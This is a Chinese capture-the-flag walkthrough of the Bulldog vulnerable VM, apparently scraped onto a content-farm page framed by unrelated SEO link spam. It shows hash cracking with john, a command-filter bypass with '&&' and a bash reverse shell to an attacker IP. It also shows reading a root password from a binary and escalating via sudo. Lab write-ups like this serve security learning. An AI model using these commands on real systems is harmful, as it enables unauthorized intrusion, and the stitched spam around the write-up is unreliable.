当前位置: 首页 > news >正文

学校培训网站开发cps广告联盟网站

news 2026/4/6 23:08:18
学校培训网站开发,cps广告联盟网站,北京城乡住房建设部网站,武汉做搜索引擎推广的公司bulldog 信息搜集 存活检测 详细扫描 后台网页扫描 网页信息搜集 正在开发的如果你正在读这篇文章,你很可能是Bulldog Industries的承包商。恭喜你!我是你们的新老板,组长艾伦布鲁克。CEO解雇了整个开发团队和员工。因此,我们需要迅速招到一…

bulldog

信息搜集

存活检测

image-20231019132847932

详细扫描

image-20231019135132191

后台网页扫描

image-20231019135202749

网页信息搜集

image-20231019204915864

image-20231019140101794

正在开发的如果你正在读这篇文章,你很可能是Bulldog Industries的承包商。恭喜你!我是你们的新老板,组长艾伦·布鲁克。CEO解雇了整个开发团队和员工。因此,我们需要迅速招到一批人。我要试着给你上一堂牛头犬工业网站的速成课。之前的网站是怎么被攻击的?APT利用了网络服务器上的一个漏洞获得了一个低权限shell。从那里,他们利用脏牛在盒子上生根。在那之后,整个系统被接管,他们破坏了网站。我们仍在从旧系统向新系统过渡。同时,我们正在使用一些文件,这些文件可能是从原始系统中损坏的。我们还没来得及确认有没有被黑的痕迹所以如果你发现了,给我发邮件。我们如何防止未来的违规行为?应Churchy先生的要求,我们将从新服务器上完全移除PHP。此外,我们不会使用PHPMyAdmin或任何其他流行的CMS系统。我们的任务是创造我们自己的。新系统的设计?新网站将完全用Django编写(Mr. Churchy要求“高端技术时髦的东西”)。到目前为止,系统上已经启用了SSH。当我们将转换到使用Web-Shell(一个专有的shell接口)时,这个功能将很快关闭。下面的链接解释了这个工具。另外,请注意,我们将开始使用MongoDB,但是我们还没有完全安装它。还要注意的是,我们将实施一个革命性的AV系统,这是由供应商为我们定制的。它宣称能够每分钟运行一次,以检测入侵和黑客行为。一旦它启动并运行,我们将把它安装到系统上。Web-Shell我该找谁开始呢?组长:alan@bulldogindustries.com备用组长:william@bulldogindustries.com前端:malik@bulldogindustries.com前端:kevin@bulldogindustries.com后端:ashley@bulldogindustries.com后端:nick@bulldogindustries.com数据库:sarah@bulldogindustries.com

在此界面的源码中发现了疑似加密的信息,依次解密查看

image-20231019205147493

Team Lead: alan@bulldogindustries.com<br><!--6515229daf8dbdc8b89fed2e60f107433da5f2cb-->Back-up Team Lead: william@bulldogindustries.com<br><br><!--38882f3b81f8f2bc47d9f3119155b05f954892fb-->Front End: malik@bulldogindustries.com<br><!--c6f7e34d5d08ba4a40dd5627508ccb55b425e279-->Front End: kevin@bulldogindustries.com<br><br><!--0e6ae9fe8af1cd4192865ac97ebf6bda414218a9-->Back End: ashley@bulldogindustries.com<br><!--553d917a396414ab99785694afd51df3a8a8a3e0-->Back End: nick@bulldogindustries.com<br><br><!--ddf45997a7e18a25ad5f5cf222da64814dd060d5-->Database: sarah@bulldogindustries.com<br><!--d8b8dd5e7f000b8dea26ef8428caf38c04466b3e-->.0

管理员登陆

  • 解析密码加密方式

    hash-identifier

  • sha-1 解密

    将密文存储到文件中

    image-20231019211911779

    john 解密

    john --format=raw-sha1 pas

    破解出密文 bulldog

    image-20231019212018179

  • 尝试当作密码登录管理员界面

    image-20231019212358962

    image-20231019212419125

    显示登陆成功,但没权限

  • 但此时 /dev/shell 界面可执行指令

    image-20231019212726765

反弹 shell

  • 执行允许的命令外的命令会被过滤

    image-20231019213719637

  • 尝试绕过

    /usr/bin/ping 127.0.0.1 -c 2

    失败

    image-20231019213806935

    pwd&&ping 127.0.0.1 -c 2

    image-20231019213845159

    可以使用 && 对过滤进行绕过

  • kali 开启监听

  • 命令框输入链接反弹 shell 命令

    pwd&&bash -c "bash -i >& /dev/tcp/10.4.7.132/7777 0>&1"

    image-20231019214246195

  • 成功连接

    image-20231019214305225

提权

  • 查找敏感文件

    image-20231019214633607

    image-20231019214659845

  • 查看二进制文件中可打印的字符

    strings customPermissionApp

    image-20231019214758371

    密码

    SUPERultimatePASSWORDyouCANTget

  • 切换用户,提示必须在终端执行

    image-20231019215418343

  • 创建一个新的终端

    python -c 'import pty;pty.spawn("/bin/sh")'

  • 切换 root

    sudo su root

    输入密码,提权成功

    image-20231019215917845

http://www.hkea.cn/news/117097/

相关文章:

  • 摄影网课百度关键词优化查询
  • 打广告型的营销网站西安百度推广外包
  • 乌鲁木齐招聘网站建设一站式网络营销
  • 中小型网站建设服务淘宝数据分析工具
  • 梧州网站设计企业网站模板建站
  • 行政事业单位网站建设建议营销策划公司
  • 网络推广网站怎么做百度联盟广告点击一次收益
  • wordpress居中样式宁波seo网络推广外包报价
  • java做网站用到哪些技术网络营销的重要性与意义
  • 网络营销推广的作用谷歌seo什么意思
  • 免费网站建设解决方案郑州网络营销公司哪个好
  • 转转怎么做钓鱼网站税收大数据
  • 株洲专业网站排名优化深圳产品网络推广
  • 深圳美食教学网站制作如何免费搭建自己的网站
  • 兰州移动端网站建设广东整治互联网霸王条款
  • 彩票网站该怎么建设天津seo实战培训
  • 原平的旅游网站怎么做的新冠疫情最新情况最新消息
  • 网站开发软件著作权归谁seo外包
  • 小说网站的网编具体做哪些工作南宁网站快速排名提升
  • 承德网站设计seo互联网营销培训
  • 工信部网站备案查询 手机seo专员的工作内容
  • 淘宝活动策划网站视频营销成功的案例
  • 精准营销数据杭州排名优化软件
  • 中卫网站建站设计seo学习论坛
  • wordpress初始登录seo排名赚app靠谱吗
  • 软件外包保密协议seo相关岗位
  • 后台网站开发文档下载班级优化大师app
  • 辛集城乡建设管理局网站网络营销网络推广
  • 阿里云部署一个自己做的网站吗电商网站搭建
  • 免费汽车租赁网站模板网站域名解析ip查询